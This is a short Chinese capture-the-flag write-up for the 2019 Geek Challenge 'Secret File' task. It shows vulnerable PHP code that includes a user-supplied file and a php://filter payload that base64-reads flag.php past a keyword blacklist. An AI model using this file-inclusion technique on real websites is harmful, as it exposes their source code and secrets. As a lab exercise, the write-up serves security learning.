首页 > 其他 > 详细

[极客大挑战 2019]Secret File

时间:2020-01-12 22:27:15      阅读:376      评论:0      收藏:0      [点我收藏+]

0x00知识点

没有过滤file

使用php的file伪协议去读取文件

?file=php://filter/convert.base64-encode/resource=flag.php

0x01解题

打开网站存在跳转。抓包,访问
http://152518b2-d342-4872-8adc-b5bcec554a4d.node3.buuoj.cn/secr3t.php
给了我们源代码

<html>????<title>secret</title>????<meta?charset="UTF-8"><?php
????highlight_file(__FILE__);
????error_reporting(0);
????$file=$_GET['file'];
????if(strstr($file,"../")||stristr($file,?"tp")||stristr($file,"input")||stristr($file,"data")){
????????echo?"Oh?no!";
????????exit();
????}
????include($file);?//flag放在了flag.php里?></html>

直接使用file伪协议读
技术分享图片

base64解密得到flag

[极客大挑战 2019]Secret File

原文:https://www.cnblogs.com/wangtanzhi/p/12184620.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!